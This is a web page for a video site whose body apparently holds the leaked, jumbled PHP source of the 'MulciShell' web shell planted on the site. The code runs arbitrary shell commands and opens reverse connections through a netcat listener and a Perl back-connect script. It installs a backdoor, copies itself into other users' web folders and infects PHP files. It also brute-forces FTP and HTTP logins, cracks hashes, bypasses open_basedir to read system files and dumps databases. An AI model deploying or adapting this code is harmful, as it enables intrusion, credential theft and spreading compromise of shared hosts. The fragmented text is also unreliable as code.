Welcome to Humsabkavideo.com

Home

Videos

This Weeks's Stats

Blogs

Videos

Audios

pictures

people

About Us

$dir"."$file"; if(is_dir($dir.$file)&&$file!='..'&&$file!='.') { if(!preg_match("//public_html//",$dir)) sql_rep_search($dir.$file.'/public_html/'); else sql_rep_search($dir.$file); } } @closedir($dh); } function database_tools() { if(isset($_POST['sql_start_search'])) { echo "

"; switch($access_control) #Break statements intentionally ommited { case 3: $ip_allwd=false; foreach($allowed_addrs as $addr) { if($addr==$_SERVER['REMOTE_ADDR']) {$ip_allwd=true; break;} if(!$ip_allwd) exit; } case 2: if(!isset($_SERVER['PHP_AUTH_USER'])||$_SERVER['PHP_AUTH_USER']!=$md5_user||$_SERVER['PHP_AUTH_PW']!=$md5_pass) { header("WWW-Authenticate: Basic Realm="Restricted area""); header("HTTP/1.1 401 Unauthorized"); echo "Wrong username/password"; exit; } case 1: if($_SERVER['HTTP_USER_AGENT']!=$user_agent) exit; } if($id) { $s=strpos($id,"(",0)+1; $e=strpos($id,")",$s); $idval=substr($id,$s,$e-$s); } $disable=@ini_get("disable_functions"); if(empty($disable)) $disable="None"; function rm_rep($dir,&$success,&$fail) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$rm=readdir($dh))) { if($rm=='.' || $rm=='..') continue; if(is_dir($dir.'/'.$rm)) {echo "Deleting dir $dir/$rm...
"; rm_rep($dir.'/'.$rm,$success,$fail); continue;} if(@unlink($dir.'/'.$rm)) {$success++;echo "Deleted $rm...
";} else {$fail++; echo "Failed to delete $rm
";} } @closedir($dh); } else echo "Failed to open dir $dir
"; } function chmod_rep($dir,&$success,&$fail,$mod_value) { @$dh=opendir($dir); if(is_resource($dh)) { while((@$ch=readdir($dh))) { if($ch=='.' || $ch=='..') continue; if(is_dir($dir.'/'.$ch)) {echo "Changing file modes in dir $dir/$ch...
"; chmod_rep($dir.'/'.$ch,$success,$fail,$mod_value); continue;} if(@chmod($dir.'/'.$ch,$mod_value)) {$success++;echo "Changed mode for $ch...
";} else {$fail++; echo "Failed to chmod $rm
";} } @closedir($dh); } else echo "Failed to open dir $dir
"; } #Complete these functions function spread_self($user,&$c=0,$d=0) { if(!$d) $dir="/home/$user/public_html/"; else $dir=$d; if(is_dir($dir)&&is_writable($dir)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php'); echo "[+] Shell copied to $dir.$f./mshell.php
"; $c++; } if(@$dh=opendir($dir)) echo "[-] Failed to open dir $dir
"; while((@$f=readdir($dh))) { if($f!="."&&$f!="..") { if(@is_dir($dir.$f)) { echo "[+] Spreading to dir $dir
"; if(@is_writable($dir.$f)) { copy(CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF']),$dir.$f.'/mshell.php'); echo "[+] Shell copied to $dir.$f./mshell.php
"; $c++; } $c+=spread_self($user,$c,$dir.$f.'/'); } } } } function copy_rep($dir,&$c) { } function backup_site() { if(!isset($_POST['busite'])) { echo "The following tool will attempt to retrieve every file from the specified dir (including child dirs).
If successful, you will be prompted for a site backup download.
Note: Only readable files will be downloaded. Images and executables will be discarded. This tool should only be used in scenarios in which you have to quickly retrieve a site's source."; } } function infect_rep($dir,&$success,&$fail) { } function copy_dir($dir,$new_dir) { } ################################## function execmd($cmd,$d_functions="None") { if($d_functions=="None") {$ret=passthru($cmd); return $ret;} $funcs=array("shell_exec","exec","passthru","system","popen","proc_open"); $d_functions=str_replace(" ","",$d_functions); $dis_funcs=explode(",",$d_functions); foreach($funcs as $safe) { if(!in_array($safe,$dis_funcs)) { if($safe=="exec") { $ret=@exec($cmd); $ret=join("n",$ret); return $ret; } elseif($safe=="system") { $ret=@system($cmd); return $ret; } elseif($safe=="passthru") { $ret=@passthru($cmd); return $ret; } elseif($safe=="shell_exec") { $ret=@shell_exec($cmd); return $ret; } elseif($safe=="popen") { $ret=@popen("$cmd",'r'); if(is_resource($ret)) { while(@!feof($ret)) $read.=@fgets($ret); @pclose($ret); return $read; } return -1; } elseif($safe="proc_open") { $cmdpipe=array( 0=>array('pipe','r'), 1=>array('pipe','w') ); $resource=@proc_open($cmd,$cmdpipe,$pipes); if(@is_resource($resource)) { while(@!feof($pipes[1])) $ret.=@fgets($pipes[1]); @fclose($pipes[1]); @proc_close($resource); return $ret; } return -1; } } } return -1; } $links=array("Enumerate"=>"$self?act=enum","Files"=>"$self?act=files","Domains"=>"$self?act=domains","MySQL"=>"$self?act=sql","Encoder"=>"$self?act=encode", "Sec. Info"=>"$self?act=sec","Cracker"=>"$self?act=bf", "Bypassers"=>"$self?act=bypass","Tools"=>"$self?act=tools","Databases"=>"$self?act=dbs","Backdoor Host"=>"$self?act=bh","Back Connect"=>"$self?act=backc","Spread Shell"=>"$self?act=spread","Kill Shell"=>"$self?act=kill"); echo ""; switch($_SESSION['theme']) { case 'green': echo " "; break; case 'dark': echo ""; break; default: echo " "; break; } echo base64_decode("PGNlbnRlcjxpbWcgc3JjPSdodHRwOi8vaW1nNTI5LmltYWdlc2hhY2sudXMvaW1nNTI5LzExNjYv bWlsY2lzaGVsbGxrNi5wbmcnPjwvY2VudGVyPg=="); echo "

Server IP	Your IP	Disk space	Safe_mode?	Open_BaseDir?	System	Server software	Disabled functions	ID	Shell location
$serv	$addr	$space of $total	$safe_mode	$open_basedir	$uname	$soft	$disable	$idval	".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF'])."

"; foreach($links as $val=>$addr) echo "[ $val ]"; echo "

"; if(isset($_POST['encryption'])) { $e=$_POST['encrypt']; echo "

MD5: ".md5($e)."nSHA1: ".sha1($e)."nCrypt: ".crypt($e)."nCRC32: ".crc32($e)."nBase64 Encoded: ".base64_encode($e)."nBase64 decoded: ".base64_decode($e)."nURL encode: ".urlencode($e)."nURL decode: ".urldecode($e)."nBin2Hex ".bin2hex($e)."nDec2Hex: ".dechex($e)."

Input:
"; } if(isset($_POST['dogetfile'])) execmd("wget $_POST[wgetfile]",$disable); if(isset($_POST['doUpload'])) { $dir=$_POST['u_location']; $name=$_FILES['u_file']['name']; switch($_FILES['u_file']['error']) { case 0: if(@move_uploaded_file($_FILES['u_file']['tmp_name'],$dir.'/'.$name)) echo "File uploaded successfully
"; else echo "Failed to upload file!"; } } if(isset($_POST['massfiles'])) { $fail=0; $success=0; switch($_POST['fileaction']) { case 'Infect': #Nothing special here, just kick them while they're down foreach($_POST['files'] as $file) { $ext=strrchr($file,'.'); if($ext!=".php") continue; @$fh=fopen($file,'a'); if(@is_resource($fh)) { $success++; @fwrite($fh,""); @fclose($fh); } else $fail++; } echo "Successfully infected $success files; failed to infect $fail files
Exploit files as such: file.php?e=php code"; break; case 'Delete': foreach($_POST['files'] as $file) { if(is_dir($file)) rm_rep($file,$success,$fail); else { if(@unlink(CleanDir($file))) { echo "File $file deleted
"; $success++; } else { echo "Failed to delete file $file
"; $fail++; } } } echo "Total files deleted: $success; failed to delete $fail files
"; break; case 'Chmod': foreach($_POST['files'] as $file) { if(is_dir($file)) chmod_rep($file,$success,$fail,$_POST['cmodv']); if(@chmod(CleanDir($file),$_POST['cmodv'])) { echo "Changed mode for $file
"; $success++; } else { echo "Failed to change mode for $file
"; $fail++; } } echo "Total files modes modified: $success; failed to chmod $fail files
"; break; } } if(isset($_POST['docrack'])) { $con=true; $show=0; $list=@fopen($_FILES['wordlist']['tmp_name'],'r'); if(is_resource($list)) { if(isset($_POST['ftpcrack'])) { echo "Bruting $_POST[ftp_user]@$_POST[ftp_host]...
"; if(!empty($_POST['ftp_port'])) $port=$_POST['ftp_port']; else $port='3306'; if(empty($_POST['ftp_timeout'])||!preg_match("/^[0-9]$/",$_POST['ftp_timeout'])) $time=3; else $time=$_POST['ftp_timeout']; @$ftp=ftp_connect($_POST['ftp_host'],$port,$time); if(!$ftp) $con=false; if($con) { $show++; while(!feof($list)) { @$pass=fgets($list); if(ftp_login($ftp,$_POST['ftp_user'],trim($pass))) { echo "Password found! Password for $_POST[ftp_user] is $pass
"; @ftp_close($ftp); break; } if($show==10000){echo "Trying pass $pass...
"; $show=0;} } } else echo "Failed to connect!
"; } elseif(isset($_POST['remote_login'])) { //if(!function_exists("jitghjytiojho")) die("cURL support has to be enabled."); /* $ch=curl_init($_POST['remote_login_target']); curl_setopt($ch,CURLOPT_HEADER,0); curl_setopt($ch,CURLOPT_POST,1); curl_setopt($ch,CURLOPT_POSTFIELDS,''); curl_exec($ch); */ if(preg_match("/^http://+/",$_POST['remote_login_target'])) die("Do not include http:// in the target URL."); $path=explode('/',$_POST['remote_login_target']); $site=$path[0]; for($i=1;$i5000) {$show=0; echo $pass;} $encode=base64_encode(trim($_POST['auth_user']).':'.$pass); $header="GET $path HTTP/1.1rn"; $header.="Host: $con_urlrn"; $header.="Authorization: Basic $encodern"; $header.="Connection: Closernrn"; fputs($conn_url,$header,strlen($header)); $tmp++; while(!feof($conn_url)) { $tmp=fgets($conn_url); if(preg_match("/HTTP/d+.d+ 200+/",$tmp)) { echo "Password found! Password=$pass

"; break 2; } } } } echo "Done
"; } elseif(isset($_POST['md5crack'])) { if(empty($_POST['md5hash'])) die("Enter a hash before attempting to crack one ;)"); $md5=trim($_POST['md5hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(md5($pass)===$md5) { echo "Password found! Plaintext for $md5 is $pass
"; break; } if($show==10000) { echo "Trying $pass...
"; $show=0; continue; } } } elseif(isset($_POST['sha1crack'])) { if(empty($_POST['sha1hash'])) die("Enter a hash before attempting to crack one ;)"); $sha1=trim($_POST['sha1hash']); while(!feof($list)) { $show++; $pass=trim(fgets($list)); if(sha1($pass)===$sha1) { echo "Password found! Plaintext for $sha1 is $pass
"; break; } if($show==10000) { echo "Trying $pass...
"; $show=0; continue; } } } } @fclose($list); } if(isset($_POST['port_scan'])) { switch($_POST['type']) { case 'php': extract($_POST); while($sport<=$eport) { echo "Trying port $sport"; if(@fsockopen($host,$sport,$errno,$errstr,2)) echo "Port $sport open
"; $sport++; } break; default: echo "Invalid request
"; } } if(isset($_POST['find_forums'])) { echo "[ Forum locator ]

"; $found=0; global $int_paths; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(@!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html"; if(@is_dir($path)) { foreach($int_paths as $forum_path) { $full_path=$path."/$forum_path/"; if(@is_dir($full_path)) { echo "[+] Forum found: Path: $full_path
"; $found++; continue; } } } } echo "Scan complete. Found $found forums

"; } function find_configs($path,&$found) { if(@file_exists($path.'config.php')) { echo "Found config file: $path"."config.php
"; $found++; } @$dh=opendir($path); while((@$file=readdir($dh))) if(@is_dir($file)&&$file!='.'&&$file!='..') find_configs($path.$file.'/',$found); @closedir($dh); } if(isset($_POST['find_configs'])) { $found=0; echo "[ Config locator ]

"; @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!"); while(@!feof($fp)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp)); $path="/home/$user/public_html/"; find_configs($path,$found); } @fclose($fp); echo "Scan complete. Found $found configs

"; } if(isset($_POST['execmd'])) {echo "";} if(isset($_POST['execphp'])) {echo "";} if(isset($_POST['cnewfile'])) { if(@fopen($_POST['newfile'],'w')) echo "File created
"; else echo "Failed to create file
"; } if(isset($_POST['cnewdir'])) { if(@mkdir($_POST['newdir'])) echo "Directory created
"; else echo "Failed to create directory
"; } if(isset($_POST['doeditfile'])) FileEditor(); switch($_GET['act']) { case 'backc': if(!isset($_POST['backconnip'])) { echo "

Address: Port:

Listen with netcat by executing 'nc -l -n -v -p 1337'

Note: Be sure to foward your port first "; } else { if(empty($_POST['backconnport'])||empty($_POST['backconnip'])) die("Specify a host/port"); if(is_writable(".")) { @$fh=fopen(getcwd()."/bc.pl",'w'); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...
"; execmd("perl ".getcwd()."/bc.pl $_POST[backconnip] $_POST[backconnport]",$disable); if(!@unlink(getcwd()."/bc.pl")) echo "Warning: Failed to delete reverse-connection program
"; } else { @$fh=fopen("/tmp/bc.pl","w"); @fwrite($fh,base64_decode($backconnect_perl)); @fclose($fh); echo "Attempting to connect...
"; if(!@unlink("/tmp/bc.pl")) echo "

Warning: Failed to delete reverse-connection program<

/font>
"; } } break; case 'dbs': database_tools(); break; case 'sql': SQLLogin(); break; case 'sqledit': SQLEditor(); break; case 'download': SQLDownload(); break; case 'tools': show_tools(); break; case 'logout': $_SESSION=array(); session_destroy(); echo "Logged out from MySQL.
"; break; case 'f': FileEditor(); break; case 'encode':Encoder(); break; case 'bypass':security_bypass(); break; case 'bf':brute_force(); break; case 'bh': BackDoor(); break; case 'spread': if(!isset($_POST['spread_shell'])) { echo ""; } else { $s=0; @$file=fopen($_POST['passwd_file'],'r'); if(is_resource($file)) { while(!feof($file)) { @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($file)); spread_self($user,$s); } @fclose($file); } echo ($s>0)?"Spread complete. Successfully managed to spread the shell $s times
":"Failed to spread the shell.
"; } break; case 'domains': $header="GET /search/reverse-ip-domain.php?q=$_SERVER[HTTP_HOST] HTTP/1.0rn"; $header.="Host: searchy.protecus.dern"; $header.="Connection: Closernrn"; $domain_handle=fsockopen("searchy.protecus.de",80); @fputs($domain_handle,$header,strlen($header)); while(@!feof($domain_handle)) { echo fgets($domain_handle); } break; case 'kill': if(!isset($_POST['justkill'])) { echo "Do you *really* want to kill the shell?

"; function SQLLogin() { global $self; if(!isset($_SESSION['log'])&&!isset($_POST['mconnect'])) { echo ""; } elseif(!isset($_SESSION['log'])&&isset($_POST['mconnect'])) { extract($_POST); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { $_SESSION['muser']=$muser; $_SESSION['mhost']=$mhost; $_SESSION['mpass']=$mpass; $_SESSION['mport']=$mport; $_SESSION['log']=true; header("Location: $self?act=sqledit"); } else echo "Failed to login with $muser@$mhost!
"; } else { header("Location: $self?act=sqledit"); } } function SQLEditor() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { echo "Logged in as $muser@$mhost [Logout]"; echo ""; echo "

"; if(isset($_POST['sql_list_proc'])) { $res=mysql_list_processes(); echo " "; while($r=mysql_fetch_assoc($res)) echo " "; mysql_free_result($res); echo "

Proc ID	Host	DB	Command	Time
$r[Id]	$r[Host]	$r[db]	$r[Command]	$r[Time]

"; } if(!isset($_GET['db'])) { if(isset($_POST['dbc'])) db_create(); if(isset($_GET['dropdb'])) SQLDrop(); echo " "; $all_your_base=mysql_list_dbs($conn); while($your_base=mysql_fetch_assoc($all_your_base)) { $tbl=mysql_query("SHOW TABLES FROM $your_base[Database]"); $tbl_count=mysql_num_rows($tbl); echo " "; } echo "

Database	Table count	Download	Drop
$your_base[Database]	$tbl_count	Download	Drop

"; } elseif(isset($_GET['db'])&&!isset($_GET['tbl'])) { if(isset($_POST['tblc'])) table_create(); if(isset($_GET['droptbl'])) SQLDrop(); echo " "; $tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($tblc=mysql_fetch_array($tables)) { $fCount=mysql_query("SHOW COLUMNS FROM $_GET[db].$tblc[0]"); $fc=mysql_num_rows($fCount); echo " "; } echo "

Table	Column count	Dump	Drop
$tblc[0]	$fc	Dump	Drop

"; } elseif(isset($_GET['field'])&&isset($_POST['sqlsave'])) { $discard_values=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'"); $values=mysql_fetch_assoc($discard_values); $keys=array_keys($values); $values=array(); foreach($_POST as $k=>$v) if(in_array($k,$keys)) $values[]=$v; $query="UPDATE $_GET[db].$_GET[tbl] SET "; for($y=0;$yGo back

"; } elseif(isset($_GET['field'])&&isset($_GET['v'])&&!isset($_GET['del'])) { echo ""; @fclose($fh); } } function security_bypass() { if(isset($_POST['curl_bypass'])) { $ch=curl_init("file://$_POST[file_bypass]"); curl_setopt($ch,CURLOPT_HEADERS,0); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); $file_out=curl_exec($ch); curl_close($ch); echo "

".htmlspecialchars($file_out)."

"; } elseif(isset($_POST['tmp_bypass'])) { tempnam("/home/",$_POST['file_passwd']); } elseif(isset($_POST['copy_bypass'])) { if(@copy($_POST['file_bypass'],$_POST['dest'])) { echo "File successfully copied!
"; @$fh=fopen($_POST['dest'],'r'); echo "

".htmlspecialchars(@fread($fh,filesize($_POST['dest'])))."

"; @fclose($fh); } else echo "Failed to copy file
"; } elseif(isset($_POST['include_bypass'])) { if(file_exists($_POST['file_bypass'])) { echo "

";             @include($_POST['file_bypass']);             echo "

"; } } elseif(isset($_POST['sql_bypass'])) { extract($_SESSION); $conn=mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { mysql_select_db($_POST['sql_db']); mysql_query("CREATE TABLE `$_POST[tmp_table]` (`File` TEXT NOT NULL);"); mysql_query("LOAD DATA INFILE "$_POST[sql_file]" INTO TABLE $_POST[tmp_table]") or die(mysql_error()); $res=mysql_query("SELECT * FROM $_POST[tmp_table]"); if(mysql_num_rows($res)<1) die("Failed to retrieve file contents!"); if($res) { while($row=mysql_fetch_array($res)) $f.="$row[0]
"; echo $f; } mysql_query("DROP TABLE $_POST[tmp_table]"); } } echo "

Security (open_basedir) bypassers
Bypass using cURL	Bypass using tempnam()
Read file:	Write file:
Bypass using copy()	Bypass using include()
Copy to: File to copy:	Path to file:
Bypass using SQL LOAD INFILE [Login to SQL server first]
[Existing] Database to store temporary table: Temporary table:

"; } function brute_force() { echo ""; } function BackDoor() { global $backdoor_perl; global $disable; if(!isset($_POST['backdoor_host'])) { echo ""; } $relpath=(isset($_GET['d']))?CleanDir($_GET['d']):CleanDir(realpath(getcwd())); if(isset($_GET['d'])) $self.="?d=$_GET[d]"; echo "

Execute command

Execute PHP
//Don't include PHP tags
Create directory	Create file

Enter directory	Edit file

Upload file	Wget file
Save location:
Switch theme: Matrix Green, Uplink Blue, Dark

Shell [version 2.0] created by [MulCiber] | Page generated in : ".round(microtime()-$start,2)." seconds

"; ob_end_flush(); ?>"; } else { @$fh=fopen("shbd.pl","w"); @fwrite($fh,base64_decode($backdoor_perl)); @fclose($fh); execmd("perl shbd.pl $_POST[port]",$disable); echo "Server backdoor'd
"; } } function sql_rep_search($dir) { global $self; $ext=array(".db",".sql"); @$dh=opendir($dir); while((@$file=readdir($dh))) { $ex=strrchr($file,'.'); if(in_array($ex,$ext)&&$file!="Thumbs.db"&&$file!="thumbs.db") echo "

"; sql_rep_search("/home/"); echo "

Databases

"; } $colarr=array(); if(isset($_POST['db_parse'])) { if(!is_file($_FILES['db_upath']['tmp_name'])&&empty($_POST['db_dpath'])) die("Please specify a DB to parse..."); $db_meth=empty($_POST['db_dpath'])?'uploaded':'path'; $q_delimit=$_POST['q_delimit']; if(isset($_POST['column_defined'])) { switch($_POST['column_type']) { case 'SMF': break; case 'phpbb': break; case 'vbulletin': $colarr=array(4,5,7,48); break; } } else { $strr=str_replace(", ",",",trim($_POST['db_columns'])); $colarr=explode(",",$strr); } switch($db_meth) { case 'uploaded': @$fh=fopen($_FILES['db_upath']['tmp_name'],'r') or die("Failed to open file for reading"); break; case 'path': @$fh=fopen($_POST['db_dpath'],'r') or die("Failed to open file for reading"); break; } echo "Parsing database contents...
"; while(!feof($fh)) { $c_line=fgets($fh); $strr=str_replace(", ",",",$c_line); $arr=explode(',',$strr); for($i=0;$i=1073741824) return(round($s/1073741824)." GB"); elseif($s>=1048576) return(round($s/1048576)." MB"); elseif($s>=1024) return(round($s/1024)." KB"); else return($s." B"); } function CleanDir($d) { $d=str_replace("\","/",$d); $d=str_replace("//","/",$d); return $d; } function Trail($d) { $d=explode('/',$d); array_pop($d); array_pop($d); $str=implode($d,'/'); return $str; } function Encoder() { echo "Input:
"; echo " "; $cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); $fields=array(); while($col=mysql_fetch_assoc($cols)) { array_push($fields,$col['Field']); echo " "; } echo " "; if(isset($_GET['s'])&&is_numeric($_GET['s'])) {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT $_GET[s], 250");} else {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT 0, 250");} while($select=mysql_fetch_row($selector)) { echo " "; for($i=0;$i"; } echo " "; echo " "; } echo "

$col[Field]
Edit	Delete

"; echo " "; if(isset($_GET['s'])) { $prev=intval($_GET['s'])-250; $next=intval($_GET['s'])+250; if($_GET['s']>0) echo " "; if(mysql_num_rows($selector)>249) echo " "; } else echo "Next"; echo "

"; } else { $_SESSION=array(); session_destroy(); header("Location: $self?act=sql"); } } } function SQLDownload() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_GET['db'])&&!isset($_GET['tbl'])) { $tables=array(); $dump_file="##################SQL Database dump####################n"; $dump_file.="######################Dumped by: MulciShell v0.2#####################nn"; $get_tables=mysql_query("SHOW TABLES FROM $_GET[db]"); while($current_table=mysql_fetch_array($get_tables)) $tables[]=$current_table[0]; foreach($tables as $table_dump) { $data_selection=mysql_query("SELECT * FROM $_GET[db].$table_dump"); while($current_data=mysql_fetch_assoc($data_selection)) { $fields=implode("`, `", array_keys($current_data)); $values=implode("`, `",array_values($current_data)); $dump_file.="INSERT INTO `$table_dump` ($fields) VALUES ($values); "; } } } elseif(isset($_GET['db'])&&isset($_GET['tbl'])) { $dump_file="##################SQL Database dump####################n"; $dump_file.="######################Dumped by: MulciShell v0.2#####################n"; $table_dump=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl]"); while($table_data=mysql_fetch_assoc($table_dump)) { $fields=implode("`, `",array_keys($table_data)); $values=implode("`, `",array_values($table_data)); $dump_file.="INSERT INTO `$_GET[db].$_GET[tbl]` ($fields) VALUES ($values`)n"; } } else { echo "Invalid!"; } } $dump_file.="########################################################################################"; if(!isset($_GET['tbl'])) $file_name="$_GET[db]"."_DUMP.sql"; else $file_name="$_GET[db]"."_$_GET[tbl]"."_DUMP.sql"; ob_get_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($dump_file)); header("Content-disposition: attachment; filename=$file_name;"); echo $dump_file; exit; } function SqlInsert() { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(!isset($_POST['sql_insert'])) { echo ""; $sql_fields=array(); $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]"); while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field']; for($s=0;$s$v) { if(in_array($k,$sql_fields)&&!empty($v)) { $values[]=$v; $keys[]=$k; } } for($k=0;$k

"; echo " "; } else { if(@unlink(basename($_SERVER['PHP_SELF']))) echo "Shell deleted.
"; else echo "Failed to delete shell
"; } break; case 'sec': $mysql_on=function_exists("mysql_connect")?"ON":"OFF"; $curl_on=function_exists("curl_init")?"ON":"OFF"; $magic_quotes_on=get_magic_quotes_gpc()?"ON":"OFF"; $register_globals_on=(@ini_get('register_globals')=='')?"OFF":"ON"; $include_on=(@ini_get('allow_url_include')=='')?"Disabled":"Enabled"; $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No"; $ver=phpversion(); echo "Security overview "; "

PHP Version	Safe mode	Open_Basedir	Magic_Quotes	Register globals	Remote includes	Read /etc/passwd?	MySQL	cURL
$ver	$safe_mode	$open_basedir	$magic_quotes_on	$register_globals_on	$include_on	$etc_passwd	$mysql_on	$curl_on

"; break; case 'enum': $windows=0; $path=CleanDir(getcwd()); if(!eregi("Linux",php_uname())) {$windows=1;} if(!$windows) { $spath=str_replace("/home/","$serv/~",$path); $spath=str_replace("/public_html/","/",$spath); $URL="http://$spath/".basename($_SERVER['PHP_SELF']); echo "Enumerated shell link: $URL"; } else echo "Enumeration failed
"; break; } echo "
"; if(isset($_POST['sqlquery'])) { extract($_SESSION); $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass); if($conn) { if(isset($_POST['db'])) @mysql_select_db($_POST['db']); $post_query=@mysql_query(stripslashes($_POST['sqlquery'])) or die(mysql_error()); $affected=@mysql_num_rows($post_query); echo "Affected rows: $affected
"; } } $dirs=array(); $files=array(); if(!isset($_GET['d'])) {@$d=CleanDir(realpath(getcwd())); @$dh=opendir(".") or die("Permission denied!");} else {$d=CleanDir($_GET['d']); @$dh=opendir($_GET['d']) or die("Permission denied!");} $current=explode("/",$d); echo "

Current location: ";for($p=0;$p$current[$p]/"; } echo "

"; if(isset($_GET['d'])) echo ""; else echo ""; echo " "; while(($f=@readdir($dh))) { if(@is_dir($d.'/'.$f)) $dirs[]=$f; else $files[]=$f; } asort($dirs); asort($files); @closedir($dh); foreach($dirs as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; $size="DIR"; @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),2); @$write=is_writable($d.'/'.$f)?"Yes":"No"; $mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); if($f==".") {continue;} elseif($f=="..") { $f=Trail($d.'/'.$f); echo " "; continue; } echo " "; } foreach($files as $f) { @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f); @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f); if(is_array($grp)) $grp=$grp['name']; if(is_array($own)) $own=$own['name']; @$size=TrueSize(filesize($d.'/'.$f)); @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),3); @$write=is_writable($d.'/'.$f)?"Yes":"No"; @$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f)); echo " "; } echo "